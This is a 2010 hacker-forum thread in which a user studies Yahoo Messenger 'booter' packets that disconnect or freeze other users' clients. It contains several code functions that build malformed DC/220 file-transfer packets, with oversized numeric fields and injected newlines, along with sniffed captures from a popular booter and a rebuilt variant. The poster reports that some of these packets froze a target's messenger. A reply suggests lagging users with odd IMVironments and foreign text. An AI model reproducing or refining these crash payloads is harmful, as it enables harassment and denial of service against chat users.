YAH-MART-INC

by **-KT-** » Thu Jul 22, 2010 10:15 am

in a thread about the 266 1BRB(one bot room boot), and suggestions about using that packet.. and whatsabooter told me to look at the topics and threads about the packet..
aside from the actual program (1st the 266-1B, and older ED.4, and then the 266 1BRB) posted..most was about discussions about the D7, BD, C2, etc..blah blah..client hitters, packets to hit Y!Epic, Y!Supra, YMSG102, and so on..
most who know are simply feeding off each others understood concept for thses packets.. but not my focus packet to study..
while most are trying to figure it out same packet shared.. the same has mixed results.. due to servers used, etc..ip temp bans from yahoo blah blah..

the DC/220 packet i started to study was jammer's C++, then the hot topic of the 266.. i missed out on the debute of that booter.. but i wanted to see it and compare it to the older C++ version that booter[266-1BRB] used the DC/220 for
...trolling using the search feature, and relevant thread topics on viprasys of johnnyjammers.. i looked for a toss of that packet..lol along the way tips and discussions of how fields are manipulated with loads of data, strings, etc..
and i think he said the [DC/220] has 3 - THREE good ways it can hit good...

i don't want to just watch the forums, grab a packet source, toss it on a app, make it fancy.. release it like anyone like myself can easily do.. and get mixed reviews - mostly good ones are from those with killer connections...
i want to actually learn and see for myself what is happening..

i trolled that forum section for programming help, and found talk of D7's and other client flooding variants and attempts to produce server side disconnects which is cool.. but i am choosing to make a true study of field manipulation .. the DC File Transfer..
my present use of the DC packet preceeded by the color fade color blocks 06 packeet ... .. popcorn

, with a pmbox lagg..
i think what i am saying is.. i know you can do tricks with data manipulations between certain fields ("AE") of a packet
the use of strings/characters between fields..how much a single character hold in data bewteen certain fields
i want to know the concept about it thoroughly..
i see it somewhat .. (what a field is, a string is, characters are, etc)..but i don't understand it fully basically..
i imagined what goes through minds like johnnyjammer and dazza, as seen in viprasys, and other coders some bored, deciding to mess and manipulate packets to see what the protocol didnt address... was it just randomized "mess with it here, mess with it there.." guess work and testing? or is it deeper, like a theory and basic concepts observed on the normal behavior of the client app( like messenger and 3rd party apps) to slight abnormalties in the packets handled by the protocol?
i hope i dont sound to deep, i really thought this out how to say and ask what i am looking for, and why i am pursuing this part. as my 1st step in understanding protocol ( with yahoo as the platform, to illustrate)

:foshizzle:

by **-KT-** » Sat Jul 24, 2010 11:32 am

Y!PA sniff

Y!PA sniff

Code: Select all: Packet Type: DC Packet Name: FILEXFER Packet Size: 151 Header Hex: 59 4D 53 47 00 11 00 00 00 97 00 DC 00 00 00 00 AC 4D 9B 73 Packet Ascii: 1À€montana_kdÀ€5À€schoolgirl.katieÀ€265À€jFMe8QE9kMxkK8Ros8iWhA$$À€222À€1À€266À€1À€302À€268À€300À€268À€27À€OPF2.zipÀ€28À€374937À€301À€268À€303À€268À€ Public Function CodedFILEXFER() Dim Packet As String 'Packet Coded By Yahoo! Protocol Assistant Packet = "1À€montana_kdÀ€5À€schoolgirl.katieÀ€265À€jFMe8QE9kMxkK8Ros8iWhA$$À€222À€1À€266À€1À€302À€268À€300À€268À€27À€OPF2.zipÀ€28À€374937À€301À€268À€303À€268À€" CodedFILEXFER = Header("DC", Packet) Debug.Print CodedFILEXFER End Function

what i made from above, below...

Code: Select all: Public Function CodedFILEXFER2(whofrom As String, whoto As String, skey As String) As String CodedFILEXFER2r$ = Header$("1À€" & whofrom$ & "À€5À€" & whoto$ & "À€265À€jFMe8QE9kMxkK8Ros8iWhA$$À€222À€1À€266À€1À€302À€268À€300À€268À€27À€OPF2.zipÀ€28À€374937À€301À€268À€303À€268À€", String$(4, Chr$(&H0)), skey$, 220) End Function

haven't put this on my modules..but doing this on notepad and discussing it here..
so my 1st question from what i got from Y!PA and coding it according to my login & header.. is
what is this part..

jFMe8QE9kMxkK8Ros8iWhA$$ <---- of Y!PA's - Packet = "1À€montana_kdÀ€5À€schoolgirl.katieÀ€265À€jFMe8QE9kMxkK8Ros8iWhA$$À€222À€1À€266À€1À€302À€268À€300À€268À€27À€OPF2.zipÀ€28À€374937À€301À€268À€303À€268À€

what Y!PA pulled after canceling the file transfer

"CANCELED FILE TRANSFER"

Code: Select all: Packet Type: DC Packet Name: FILEXFER Packet Size: 74 Header Hex: 59 4D 53 47 00 11 00 00 00 4A 00 DC 00 00 00 00 AC 4D 9B 73 Packet Ascii: 1À€montana_kdÀ€5À€schoolgirl.katieÀ€265À€jFMe8QE9kMxkK8Ros8iWhA$$À€222À€2À€ Public Function CodedFILEXFER() Dim Packet As String 'Packet Coded By Yahoo! Protocol Assistant Packet = "1À€montana_kdÀ€5À€schoolgirl.katieÀ€265À€jFMe8QE9kMxkK8Ros8iWhA$$À€222À€2À€" CodedFILEXFER = Header("DC", Packet) Debug.Print CodedFILEXFER End Function

------------------------------------

My DC/220 (from friend) packet:
"A"

Code: Select all: Public Function FileError(whofrom As String, whoto As String, skey As String) As String FileError$ = Header$("1À€" & whofrom$ & "À€5À€" & whoto$ & "À€222À€1À€265À€8888888888À€266À€77777777777À€302À€268À€300À€268À€27À€ À€28À€ -99999999999À€301À€268À€303À€268À€", String$(4, Chr$(&H0)), skey$, 220) End Function

From jammer's C++ SrcPjr (2009)
"B"

Code: Select all: Public Function FileError2(whofrom As String, whoto As String, skey As String) As String FileError2$ = Header$("1À€" & whofrom$ & "À€5À€" & whoto$ & "À€265À€" & String$(1, Chr(10)) & "À€222À€1À€266À€1À€302À€268À€300À€268À€27À€" & String$(1, Chr(10)) & "À€28À€999999999999999999999999999999999999999À€301À€268À€303À€268À€", String$(4, Chr$(&H0)), skey$, 220) End Function

packet i got sniffing a normal file transfer
"C"

Code: Select all: Public Function CodedFILEXFER2(whofrom As String, whoto As String, skey As String) As String CodedFILEXFER2r$ = Header$("1À€" & whofrom$ & "À€5À€" & whoto$ & "À€265À€jFMe8QE9kMxkK8Ros8iWhA$$À€222À€1À€266À€1À€302À€268À€300À€268À€27À€OPF2.zipÀ€28À€374937À€301À€268À€303À€268À€", String$(4, Chr$(&H0)), skey$, 220) End Function

(observation 1)
here i see the on the 1st one -"A".. after the whoto$ is the 222 field, jammer's c++ 2009 -"B" and Y!PA Y!M 10 -"C" is the 265 field..

"A" has this --> 222 & 1 & 265 & 266 & 77777777777 & 302 & 268 & 300 & 268 & 27

Code: Select all: À€222À€1À€265À€8888888888À€266À€77777777777À€302À€268À€300À€268À€27À€

"B" has this --> 265 & 222 & 1 & 266 & 1 & 302 & 268 & 300 & 268 & 27

Code: Select all: À€265À€" & String$(1, Chr(10)) & "À€222À€1À€266À€1À€302À€268À€300À€268À€27À€

"C" has this --> 265 & 222 & 1 & 266 & 1 & 302 & 268 & 300 & 268 & 27

Code: Select all: À€265À€jFMe8QE9kMxkK8Ros8iWhA$$À€222À€1À€266À€1À€302À€268À€300À€268À€27

(observation 2)
hmmm okay are not most fields are 'divided by that "À€" Yes? or No? or somewhat? help me here understand lol
okay my observation is this after the 266 and 302 is
"A" : 77777777777
"B" : 1
"C" : 1

(observation 3)
file name from "C" is OPF2.zip between fields 27 & 28
"B" is À€27À€" & String$(1, Chr(10)) & "À€28À€
"A" is À€27À€ À€28À€ [ a space?]

(observation 4)
"A" has this after field 28 --> À€28À€ -99999999999À€301À€268À€303À€268À€
"B" has this after field 28 --> À€28À€999999999999999999999999999999999999999À€301À€268À€303À€268À€
"C" has this after field 28 --> À€28À€374937À€301À€268À€303À€268À€

------------------------

I SNIFFED a Popular 1 bot booter using a DC packet with Y!PA..

confusing..lol

PACKET 1

Code: Select all: Packet Type: DC Packet Name: FILEXFER Packet Size: 116 Header Hex: 59 4D 53 47 00 10 00 00 00 74 00 DC 00 00 00 00 FE 4B EF 61 Packet Ascii: 1À€schoolgirl.katieÀ€5À€montana_kdÀ€265À€-À€222À€1À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€ Public Function CodedFILEXFER() Dim Packet As String 'Packet Coded By Yahoo! Protocol Assistant Packet = "1À€schoolgirl.katieÀ€5À€montana_kdÀ€265À€-À€222À€1À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€" CodedFILEXFER = Header("DC", Packet) Debug.Print CodedFILEXFER End Function

PACKET 2

Code: Select all: Packet Type: DC Packet Name: FILEXFER Packet Size: 116 Header Hex: 59 4D 53 47 00 11 00 00 00 74 00 DC 00 00 00 01 AC 4D 9B 73 Packet Ascii: 4À€schoolgirl.katieÀ€5À€montana_kdÀ€222À€1À€265À€-À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€ Public Function CodedFILEXFER() Dim Packet As String 'Packet Coded By Yahoo! Protocol Assistant Packet = "4À€schoolgirl.katieÀ€5À€montana_kdÀ€222À€1À€265À€-À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€" CodedFILEXFER = Header("DC", Packet) Debug.Print CodedFILEXFER End Function

PACKET 3

Code: Select all: Packet Type: DC Packet Name: FILEXFER Packet Size: 116 Header Hex: 59 4D 53 47 00 10 00 00 00 74 00 DC 00 00 00 00 FE 4B EF 61 Packet Ascii: 1À€schoolgirl.katieÀ€5À€montana_kdÀ€265À€-À€222À€1À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€ Public Function CodedFILEXFER() Dim Packet As String 'Packet Coded By Yahoo! Protocol Assistant Packet = "1À€schoolgirl.katieÀ€5À€montana_kdÀ€265À€-À€222À€1À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€" CodedFILEXFER = Header("DC", Packet) Debug.Print CodedFILEXFER End Function

PACKET 4

Code: Select all: Packet Type: DC Packet Name: FILEXFER Packet Size: 116 Header Hex: 59 4D 53 47 00 11 00 00 00 74 00 DC 00 00 00 01 AC 4D 9B 73 Packet Ascii: 4À€schoolgirl.katieÀ€5À€montana_kdÀ€222À€1À€265À€-À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€ Public Function CodedFILEXFER() Dim Packet As String 'Packet Coded By Yahoo! Protocol Assistant Packet = "4À€schoolgirl.katieÀ€5À€montana_kdÀ€222À€1À€265À€-À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€" CodedFILEXFER = Header("DC", Packet) Debug.Print CodedFILEXFER End Function

PACKET 5

Code: Select all: Packet Type: DC Packet Name: FILEXFER Packet Size: 116 Header Hex: 59 4D 53 47 00 11 00 00 00 74 00 DC 00 00 00 01 AC 4D 9B 73 Packet Ascii: 4À€schoolgirl.katieÀ€5À€montana_kdÀ€222À€1À€265À€-À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€ Public Function CodedFILEXFER() Dim Packet As String 'Packet Coded By Yahoo! Protocol Assistant Packet = "4À€schoolgirl.katieÀ€5À€montana_kdÀ€222À€1À€265À€-À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€" CodedFILEXFER = Header("DC", Packet) Debug.Print CodedFILEXFER End Function

so have i constructed this right?

PACKET 1
"D"

Code: Select all: Public Function CodedFILEXFER3(whofrom As String, whoto As String, skey As String) As String CodedFILEXFER3r$ = Header$("1À€" & whofrom$ & "À€5À€" & whoto$ & "À€222À€1À€265À€-À€266À€1234567890À€302À€268À€300À€268À€27À€1À€28À€1À€301À€268À€303À€268À€", String$(4, Chr$(&H0)), skey$, 220) End Function

hope it is, cuz i have been seeing and comparing and noting..

(observation 1)
here i see the on the 1st one -"A" & "D".. after the whoto$ is the 222 field, jammers C++(2009) -"B" and Y!PA YahooMessy 10-"C" is the 265 field..

"A" has this --> 222 & 1 & 265 & 266 & 77777777777 & 302 & 268 & 300 & 268 & 27
À€222À€1À€265À€8888888888À€266À€77777777777À€302À€268À€300À€268À€27À€
"B" has this --> 265 & 222 & 1 & 266 & 302 & 268 & 300 & 268 & 27
À€265À€" & String$(1, Chr(10)) & "À€222À€1À€266À€1À€302À€268À€300À€268À€27À€
"C" has this --> 265 & 222 & 1 & 266 & 1 & 302 & 268 & 300 & 268 & 27
À€265À€jFMe8QE9kMxkK8Ros8iWhA$$À€222À€1À€266À€1À€302À€268À€300À€268À€27À€

"D" has this --222 & 1 & 265 & - & 266 & 123456789 & 302 & 268 & 27
À€222À€1À€265À€-À€266À€1234567890À€302À€268À€300À€268À€27À€
(the char "-" between 265 & 266)

(observation 2)
hmmm okay are not most fields are 'divided by that "À€" Yes? or No? or somewhat? help me here understand lol
okay my observation is this after the 266 and 302 is
"A" : 77777777777
"B" : 1
"C" : 1

"D" : 1234567890

(observation 3)
file name from "C" is OPF2.zip between fields 27 & 28
"C" is À€27À€OPF2.zipÀ€28À€
"B" is À€27À€" & String$(1, Chr(10)) & "À€28À€
"A" is À€27À€ À€28À€ [ a space?]

"D" is À€27À€1À€28À€

(observation 4)
"A" has this after field 28 --> À€28À€ -99999999999À€301À€268À€303À€268À€
"B" has this after field 28 --> À€28À€999999999999999999999999999999999999999À€301À€268À€303À€268À€
"C" has this after field 28 --> À€28À€374937À€301À€268À€303À€268À€

"D" has this after field 28 --> À€28À€1À€301À€268À€303À€268À€

summary:
"A" [space]-99999999999
"B" 999999999999999999999999999999999999999
"C" 374937

"D" 1

between the packets
"A" 1 bot out of 15 froze messenger to point of user's patience to ride it out or end process (self boot)
"B" pops like popcorn

, but no lagg.. this old pc managed to ride it out and manually close the windows
(also only 1 bot out of 18..)
"C" lol i opened a pm to a bot added on my yahoo account.. dropped a zip in the box

"D" - str8 froze my messy

(from booter, 1 bot delivery .. not from use of my packet constructed here..[yet])

this is what i am thinking even before trying the packet i got from Y!PA (and i had done the others yet..some have the packet begin with 4À€)
so i puased to drop what i am thinking as i play with this lil distraction from myspace bulletin survey posting..lol

by **munk** » Sat Aug 28, 2010 1:13 am

if you want to lag some one just use some imvs's mixed with foreign text text ¿ Á Ñ ç ř Π ℉ ⅛ ∫ √ ∑ i used to have this one that made blocks. it was the best one it was an A- i dunno where to find that now if you had one my old booter you could just sniff the packet.

YAH-MART-INC

Project study: Yahoo's "DC" FileTransfer & the 266 1B

Project study: Yahoo's "DC" FileTransfer & the 266 1B

Re: Project study: Yahoo's "DC" FileTransfer & the 266 1B

Re: Project study: Yahoo's "DC" FileTransfer & the 266 1B

Who is online